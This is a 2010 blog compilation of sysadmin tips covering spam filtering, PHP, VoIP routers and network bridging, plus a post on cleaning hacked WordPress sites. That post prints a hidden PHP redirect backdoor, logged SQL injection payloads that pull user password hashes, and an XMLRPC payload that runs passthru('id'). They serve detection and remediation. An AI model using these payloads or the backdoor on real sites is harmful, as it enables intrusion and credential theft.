Friday, March 12, 2010

spamassassin block all Viagra emails{KeyWord}

SkyHi @ Friday, March 12, 2010

Well, you can try these kind of simple rules:

header   VIAGRA_SUBJECT Subject =~ /viagra/i
header VIAGRA_FROM
From =~ /viagra/i
meta VIAGRA_HEADER VIAGRA_FROM
&& VIAGRA_SUBJECT
score VIAGRA_HEADER
10.0
describe VIAGRA_HEADER
Block Mails with Viagra in subject

body VIAGRA_BODY
/viagra/i
score VIAGRA_BODY
10.0
describe VIAGRA_BODY
Block Mails with Viagra in body


===============================================

Put into your local.cf:

body BODY_VIAGRA /viagra/i
describe BODY_VIAGRA Something about viagra
score BODY_VIAGRA 2

Some explanations:
body BODY_VIAGRA /viagra/i
body - search for specified word/phrase in email's body (you can put here 'header' to search headers instead of body).
BODY_VIAGRA - rule name (can be anything you want)
/viagra/i - regex pattern to match your word/phrase. ending 'i' flag means case insensitive

describe BODY_VIAGRA Something about viagra
This line is description for rule BODY_VIAGRA, and description is: "Something about viagra".

score BODY_VIAGRA 2
Give 2 additional points every email which matches BODY_VIAGRA rule.


REFERENCES
http://stackoverflow.com/questions/2246294/local-cf-spamassassin
http://74.125.155.132/search?q=cache:BDvTLmfyqHQJ:www.experts-exchange.com/OS/Linux/Administration/Q_24144658.html+spamassassin+block+viagra&cd=10&hl=en&ct=clnk&gl=ca

Using Plesk’s SMTP Server: DNS Blacklist Prevents Sending

SkyHi @ Friday, March 12, 2010

If you’re trying to use your Plesk’s SMTP service to allow sending e-mail, you might run into the following error: rblsmtpd: <IP ADDRESS>: 451 http://www.spamhaus.org/query/bl?ip=<IP ADDRESS>.

The cause of this error, is the enabled option to check for DNS blacklists. It’ll find that the user’s (often dynamic) IP address isn’t allowed to send e-mail to the Plesk’s SMTP service. A common cause for this, is the use of the “zen.spamhaus.org“, which is a combination of SBL, XBL and PBL blacklists.

And the PBL blacklist, has the following warning-message in the FAQ.

Caution: Because the PBL lists normal customer IP space, do not use PBL on smarthosts or SMTP AUTH outbound servers for your own customers (or you risk blocking your own customers if their dynamic IPs are in the PBL). Do not use PBL in filters that do any ‘deep parsing’ of Received headers, or for other than checking IP addresses that hand off to your mailservers.

Disabling the zen.spamhaus.org will cure this issue. You can enable the xbl.spamhaus.org;sbl.spamhaus.org DNS blackhole list to get a combination of XBL and SBL blacklists, without PBL.

This does, however, have another drawback. Enabling the remaining DNS blackhole lists, will prevent (authenticated) e-mail communication over port 25. Meaning you still can’t send e-mail.

Bummer. But fixeable.

Enable the Message Submission option, on the Plesk page Server > Mail.

This will make the SMTP service also available on port 587, configured to allow Authenticated SMTP connections with disregard of the DNS Blackhole list. The only drawback is it can’t be used in combination with the zen.spamhaus.org (which is why we changed it in the first place).

Outlook should then be configured to send e-mail over port 587, instead of the default port 25.

Go to Tools > Account Options and doubleclick the account you’re using. Go to More Settings and proceed to the tab “Advanced“. There, you can change the Outgoing mailserver (SMTP) port to 587.

Seems like a lot of work, but it appears to be the only way to use the SMTP service in Plesk, in combination with a DNS Blackhole list and dynamic IP ranges.


REFERENCE

http://mattiasgeniar.be/2009/01/14/using-plesks-smtp-server-dns-blacklist-prevents-sending/



I can't upload a file larger than 8MB through a PHP script

SkyHi @ Friday, March 12, 2010
If you have php error logging with reporting set to E_ALL then you will see the PHP Error reported:

PHP Warning: POST Content-Length of 9470478 bytes exceeds the limit of 8388608 bytes in Unknown on line 0

The problem is unset or incorrect settings in your PHP configuration file.

To allow file uploads larger than the default 8 megabytes, put these settings in your php.ini:

post_max_size = 16M
upload_max_filesize = 16M


You can check phpinfo() output to make sure that those values get set correctly.

Also make sure that your script does not have an html form input tag for MAX_FILE_SIZE that is smaller (in bytes) than the size of the files that you are trying to upload.

Now you will be able to upload files up to 16 megabytes.

NOTE: although PHP.net lists post_max_size as being a PHP_INI_PERDIR, because of the way we run PHP in CGI, this cannot be changed in your .htaccess file. However, there is a workaround:

Copy your current php.ini file into the directory that you require the custom post_max_size in.

**THE NEXT STEP IS VERY IMPORTANT**
Obviously, we don't want the outside world to have access to your settings in your php.ini file. The solution? Drop an .htaccess file in the same directory with the following lines in it:

<Files ~ "^.*\.ini">
Deny From All
</Files>

This will deny any web requests to any file in that directory ending in .ini; thus preventing your PHP settings from being seen by others.

Now you have a secure php.ini file that you can modify settings in to affect the .php files within that directory.

REFERENCE
http://support.modwest.com/content/0/219/en/kb.html

Everything about SpamAssassin and spam!

SkyHi @ Friday, March 12, 2010
Contrary to popular belief, spam is easy to combat. All it takes is a well configured SpamAssassin running on the server. Unfortunately the definition of "well configured" is very loosely defined in this context as its completely different for every domain/server.

One such example is the average person who blocks emails that contain the word "viagra", but an actual medical doctor may use that word rather regularly.

So here is how to make SpamAssassin block 99% of spam:


STEP 1 - Raise score for Realtime Blackhole lists (RBL)

The default scores for RBLs are set too low. For example, if an email is marked as spam by SORBS then there is no reason giving it a score of 2. Based on my tests over a two year period RBLs are very safe to use. There are some issues with SpamCop but those always resolve after a few days.

Edit your "/etc/mail/spamassassin/local.cf" and add:

Code:
# Raise RBL scores
score RCVD_IN_BL_SPAMCOP_NET 10
score RCVD_IN_SBL 5
score RCVD_BY_IP 2
score DNS_FROM_AHBL_RHSBL 3
score URIBL_WS_SURBL 3
score RCVD_IN_SORBS_WEB 3
score RCVD_IN_SORBS_SMTP 3
score URIBL_OB_SURBL 5
score RCVD_IN_NJABL_DUL 4
score RCVD_IN_XBL 5
score RCVD_IN_SORBS_DUL 3
score URIBL_SBL 5
score URIBL_JP_SURBL 4

STEP 2 - Raise score for BAYES

The default scores for BAYES are set to the lowest possible. These scores are automaticaly generated by a special script used by the developers of SpamAssassin and its generates the score based on all the rules. Unfortunately the high probability scores are too low, for example a 90% probability is a definit spam, so there is no reason why its score should be 2.

Edit your "/etc/mail/spamassassin/local.cf" and add:

Code:
# Raise bayes scores<br />score BAYES_80 3.5<br />score BAYES_95 4.5<br />score BAYES_99 5.0

STEP 3 - S.A. Rules Emporium (SARE)

There is a special team of commandos who track daily spam. These guys have sat down and written rules that target specific strings within spam. One such tick is to scan for telephones and addresses used in spam, thus they don't need to look for "viagra" in all its different variations instead they look for the phone or address of the guy selling them. As a result, their rules allow a doctor to get emails with "viagra" in them, while blocking spam at the same time.

These guys go even further, they have rules for:
- Rules to detect commonly abused redirectors and uri obfuscation techniques.
- Addresses and phone numbers harvested from spam
- Bayes poison using lists of words with equal length
- HTML coding rules that detect various spammer tricks applied through HTML coding within messages
- Header rules that are not found in other SARE rulesets.
- Rule set which flags specific spam and/or spam from specific spammers
- SARE Adult rules are designed to catch spam with "Adult" material.
- SARE "BML" rules are designed to catch "business, marketing and educational" spam.
- SARE Fraud rules are designed to catch "Nigerian 419", "International Lotto", etc. type scams.
- LOADS OF OTHERS...

Their website is at: http://www.rulesemporium.com/

Below are the safest rule sets which can be used everywhere. Just go to your "/etc/mail/spamassassin/" directory and run the following commands from the shell, thats all you need to do, they are automaticaly included when SA scans that directory.

Code:
wget http://www.rulesemporium.com/rules/70_sare_evilnum0.cf<br />wget http://www.rulesemporium.com/rules/70_sare_evilnum1.cf<br />wget http://www.rulesemporium.com/rules/70_sare_header0.cf<br />wget http://www.rulesemporium.com/rules/70_sare_html0.cf<br />wget http://www.rulesemporium.com/rules/70_sare_oem.cf<br />wget http://www.rulesemporium.com/rules/72_sare_redirect_post3.0.0.cf<br />wget http://www.rulesemporium.com/rules/99_sare_fraud_post25x.cf<br />wget http://www.rulesemporium.com/rules/70_sare_genlsubj0.cf

STEP 4 - Final step

Finally, make sure your required score is still set to the default 5 because all the above rules expect that it hasn't been changed.

Code:
required_score 5.0
Once you've run your system with the above and you are comfortable with the results, you may automaticaly delete spam with a score of 8 or more. The safest way is to create a filter rule in cPanel (Mail -> Email Filtering):

Code:
Select "Any header" that "contains" the string "X-Spam-Level: ********" (without quotes)<br /><br />The result is this:<br /><br />$message_headers contains "X-Spam-Level: ********"
__________________
Top Server Tips by thisisit3

Monitoring script for WHM
Exim customization
Complete Guide to Backups
SSL certificates
SpamAssassin and spam
Logs & logrotate
BFD rules for Jag servers
Server Memory Usage script
Clean your /var/log/messages
Use your dcpumon
Apache memory limit (RlimitMEM)


REFERENCE
http://www.jaguarpc.com/forums/showthread.php?t=17227


Wednesday, March 10, 2010

Did your WordPress site get hacked?

SkyHi @ Wednesday, March 10, 2010

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
    define(‘SECRET_KEY’, ‘1234567890′ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:
    < ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:
    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>
  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )
  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
    HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member></blockquote>

  5. That fails too so the query is repeated with similar SQL.
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
  6. Then he tries a trackback:
    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\’
    [1740009377] => 1
    [496546471] => 1
    )
  7. And another trackback:
    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\’)/*
    [charset] => UTF-7
    )
  8. Before finally going back to xmlrpc.php with this POST request:
    <?xml version=”1.0″?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>
  9. In between, he also tries the following GET requests:
    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

You might also like









REFERENCE:
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

Monday, March 8, 2010

VOIP problem

SkyHi @ Monday, March 08, 2010
I currently got 2 problems with my WNR854T router, perhaps someone can help me here. I'm using firmware version 1.4.22.

* My VOIP router in bridge mode is somehow blocked by the WNR854T, I have tried UPNP and configuring port forwarding myself. I have forwarded the following ports manually: 5060-5061, 10000-10007, 3478-3479. VOIP works great on my old DLink router (configured those ports manually there too), but the netgear router seems to block the connection when making the actual phone call. I have tried disabling the SPI, but it doesn't help.

Anyone got any good suggestions how to make the VOIP work through the netgear router? Perhaps I should try an older firmware version?

* If I do an erase and start to reconfigure the router, I usually start by disabling the wireless, after doing most of my settings the "Enable Wireless Router Radio" setting gets enabled by itself automatically, and the funny thing is that I can't disable it again after that!

=============

Since Jope says that the ‘VOIP router is in bridge mode’ this implies to me that the VOIP router is also the modem? If so it will be on the WAN side of the Netgear router in which case DMZ would not be applicable? I don't do VOIP so could be wide of the mark here, but wouldn't the audio connection to the VOIP router also be on the WAN side of the Netgear, i.e. direct to the VOIP router? It might help if we knew the brand and model number of the VOIP router.

=============
Thanks for the answers, but I solved this by downgrading to firmware version 1.4.09.

Actually the VOIP router is connected as "just another device" on the LAN side. I tried setting it as DMZ before I downgraded, but it didn't work, somehow it could not get a proper connection to the server. The router is a Vood 322i.

Don't know if the problem with automatic wireless activation was solved by downgrading the firmware, don't really want to change anything now that I got it "working".

Lesson learned, next time I get the idea I need a new router I will build it myself and run pfsense or m0n0wall on it.


===========
Are you using UPnP? Yes.
Disable SPI? Yes.
DMZ? No.
Port forwarding? No.

==========

REFERERNCE
http://forum1.netgear.com/showthread.php?p=52928



Sharing Internet connection using bridge mode

SkyHi @ Monday, March 08, 2010

Sharing Internet connection using bridge mode






Internet connection can be shared with another computer if you have a free Ethernet port

Sharing via bridge mode


When using a box, first activate the router functions of your box so that it can assign different IP to each PC.

E.g
Imagine that you have a PC with 2 Ethernet interface:

eth0 is connected to the Internet (and is automatically assigned IP 192.168.0.x by the dhcp.
eth1 is a free interface (configured with a fixed IP 10.0.0.1).



Your /etc/network/interfaces file must look like this:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet static
address 10.0.0.1
netmask 255.255.255.0


We will connect a second PC to the eth1 port like this:



Making use of the bridge implies that any Ethernet frame received on an ethernet interface (eth0 or eth1) will be re-issued on the other. Just like hen connecting 2 PC via a hub.



PC2 will have its IP address automatically assigned by the box, and can connect directly to the Internet.
Installation

Installing bridge-utils


Type: sudo apt-get install bridge-utils

Change the configuration

Modify the /etc/network/interfaces file

auto lo<br />iface lo inet loopback<br /><br />auto br0<br />iface br0 inet dhcp<br />bridge_ports eth0 eth1<br /><br />auto eth1<br />iface eth1 inet static<br />address 10.0.0.1<br />netmask 255.255.255.0

Notes


To validate this configuration, type: sudo /etc/init.d/networking restart

The bridge br0 is configured to obtain IP address via DHCP and then is asked to connect "virtually" eth0 and eth1 with using the following command: bridge_ports eth0 eth1.

On PC2, you just have to configure it with DHCP (automatic IP address).

REFERENCE
http://en.kioskea.net/faq/1089-sharing-internet-connection-using-bridge-mode

Routers SIP ALG

SkyHi @ Monday, March 08, 2010

Introduction

Many of today's commercial routers implement SIP ALG (Application-level gateway), coming with this feature enabled by default. While ALG could help in solving NAT related problems, the fact is that many routers' ALG implementations are wrong and break SIP.

There are various solutions for SIP clients behind NAT, some of them in client side (STUN, TURN, ICE), others in server side (Proxy RTP as RtpProxy, MediaProxy). ALG works typically in the client LAN router or gateway. In some scenarios some client side solutions are not valid, for example STUN with symmetrical NAT router. If the SIP proxy doesn't provide a server side NAT solution, then an ALG solution could have a place.

An ALG understands the protocol used by the specific applications that it supports (in this case SIP) and does a protocol packet-inspection of traffic through it. A NAT router with a built-in SIP ALG can re-write information within the SIP messages (SIP headers and SDP body) making signaling and audio traffic between the client behind NAT and the SIP endpoint possible.



SIP ALG example

  • caller behind NAT with private IP 192.168.1.33.
  • caller router public IP 192.0.2.200
  • SIP proxy in Internet with domain "example.com".


INVITE from the LAN client (with private IP)

INVITE sip:destino@example.com SIP/2.0
Via: SIP/2.0/UDP 192.168.1.33:5060;branch=z9hG4bKjyofoqmp
Max-Forwards: 70
To: <sip:destino@example.com>
From: "Iñaki" <sip:ibc@example.com>;tag=nrrrx
Call-ID: xetazdjyktlpsfo@192.168.1.33
CSeq: 800 INVITE
Contact: <sip:ibc@192.168.1.33:5060>
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.1
Content-Length: 312

v=0
o=ibc 1090098764 894503441 IN IP4 192.168.1.33
s=-
c=IN IP4 192.168.1.33
t=0 0
m=audio 8000 RTP/AVP 98 97 8 0 3 101
a=rtpmap:98 speex/16000
a=rtpmap:97 speex/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=ptime:20
a=zrtp


Note that text in red needs to be fixed before it arrives to the proxy (in case our proxy doesn't provide us a NAT server solution). If not, the proxy reply will not arrive at the client (caller):
  • The caller couldn't receive in-dialog/sequential messages (ACK for the INVITE, BYE, REFER, re-INVITE...) since the address in "Contact" is not routable outside their network.
  • Unidirectional audio since the caller told the callee to send audio to a non-routable address and port (so the caller won't hear the callee).

The text in blue doesn't need to be fixed since SIP already handles it (the server adds the parameter "received=REAL_SOURCE_IP" to the "Via" header and sends the replies to that address). Anyway some ALG implementations also change this value.


The same INVITE modified by the ALG router:

INVITE sip:destino@example.com SIP/2.0
Via: SIP/2.0/UDP 192.0.2.200:12345;branch=z9hG4bKjyofoqmp
Max-Forwards: 70
To: <sip:destino@example.com>
From: "Iñaki" <sip:ibc@example.com>;tag=nrrrx
Call-ID: xetazdjyktlpsfo@192.168.1.33
CSeq: 800 INVITE
Contact: <sip:ibc@192.0.2.200:12345>
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.1
Content-Length: 312

v=0
o=ibc 1090098764 894503441 IN IP4 192.168.1.33
s=-
c=IN IP4 192.0.2.200
t=0 0
m=audio 33445 RTP/AVP 98 97 8 0 3 101
a=rtpmap:98 speex/16000
a=rtpmap:97 speex/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=ptime:20
a=zrtp


The ALG has fixed the NAT related problem by:
  • Replacing IP in "Via" header with the public IP and port.
  • Replacing "Contact" with mapped public IP and port.
  • Replacing SDP media address with public IP and port.




SIP ALG problems

The main problem is the poor implementation at SIP protocol level of most commercial routers and the fact that this technology is just useful for outgoing calls, but not for incoming calls:
  • Lack of incoming calls: When a UA is switched on it sends a REGISTER to the proxy in order to be localizable and receive incoming calls. This REGISTER is modified by the ALG feature (if not the user wouldn't be reachable by the proxy since it indicated a private IP in REGISTER "Contact" header). Common routers just mantain the UDP "conntection" open for a while (30-60 seconds) so after that time the port forwarding is ended and incoming packets are discarded by the router. Many SIP proxies mantain the UDP keepalive by sending OPTIONS or NOTIFY messages to the UA, but they just do it when the UA has been detected as natted during the registration. A SIP ALG router rewrites the REGISTER request so the proxy doesn't detect the NAT and doesn't mantain the keepalive (so incoming calls will be not possible).
  • Breaking SIP signalling: Many of the actual common routers with inbuilt SIP ALG modify SIP headers and the SDP body incorrectly, breaking SIP and making communication just impossible. Some of them do a whole replacing by searching a private address in all SIP headers and body and replacing them with the router public mapped address (for example, replacing the private address if it appears in "Call-ID" header, which makes no sense at all). Many SIP ALG routers corrupt the SIP message when writting into it (i.e. missed semi-colon ";" in header parameters). Writting incorrect port values greater than 65536 is also common in many of these routers.
  • Dissallows server side solutions: Even if you don't need a client side NAT solution (your SIP proxy gives you a server NAT solution), if your router has SIP ALG enabled that breaks SIP signalling, it will make communication with your proxy impossible.



List of routers with SIP ALG enabled

The following is a list containing SIP ALG router models, their issues and how to disable SIP ALG (enabled by default in most of the cases). Please add more data to this list if you have experimented problems due to a SIP ALG router.


SpeedTouch

Models: ST530 v6 (firmware >= 5.4.0.13) comes with SIP ALG enabled by default.
NAT type: symmetrical
Issues:
  • No incoming calls.
  • It replaces the private IP appearing in SIP headers with the public IP using a dumb text replacement. If for example the private IP appears in the "Call-ID" it replaces it too (that it's completely unnecessary).
To disable SIP ALG:
~# telnet router
-> connection unbind application=SIP port=5060
-> saveall


Zyxel

Models: 660 family comes with SIP ALG enabed by default.
NAT type: symmetrical
Issues:
  • No incoming calls.
  • SIP protocol broken making 50% of outgoing calls impossible because the wrong values are inserted into SIP headers.
To disable SIP ALG:
~# telnet router
Menu option "24. System Maintenance".
Menu option "8. Command Interpreter Mode".
ip nat service sip active 0


Netgear

Models: WGR614v9 Wireless-G Router, DGN2000 Wireless-N ADSL2+ Modem Router
Firmware V1.0.18_8.0.9NA
To disable SIP ALG: From Wan Setup Menu, NAT Filtering, uncheck the box next to "Disable SIP ALG"


SMC

Models: ToDo
NAT type: No symmetrical
Issues:
  • The ALG doesn't replace the private address in "Call-ID" header (that is correct) but it does replace the "call-id" value in "Refer-To" header so SIP transfer is broken.
To disable SIP ALG: ToDo no ALG related options found via web and telnet. No idea of how to dissable it.


Linksys

Models: WRV200, WRT610N
NAT type: Symmetrical
Issues:
  • The ALG replaces the private address in "Call-ID" header (not needed at all). Some phones (as Linksys with latest firmware) encode the "Call-ID" value in the "Refer-To" header (by escaping the dots) so the private IP appearing there is not replaced with the public IP. This causes that the call transfer fails since the proxy/PBX/endpoint will not recognize the dialog info.
To disable SIP ALG: ToDo no ALG related options found via web and telnet. No idea of how to disable it.
To disable SIP ALG on WRT610N: Web Interface: Administration, Management, under side heading 'Advanced Features' SIP ALG, can be disabled.

Peplink Multi-WAN routers

Models: All multi-WAN models
To disable SIP ALG, go to http://<router.LAN.IP>/cgi-bin/MANGA/support.cgi
Click the "Disable" button under "SIP ALG Support"
Issues:
  • I'm not aware of any SIP ALG issues, but if you just want to turn it off, here you go.


Fortinet

Models: 800 comes with SIP ALG enabed by default.
To disable SIP ALG:
~# telnet firewall
config system settings
set sip-helper disable
set sip-nat-trace disable
end

config system session-helper
delete 12
end









See Also

REFERENCE
http://www.voip-info.org/wiki/view/Routers+SIP+ALG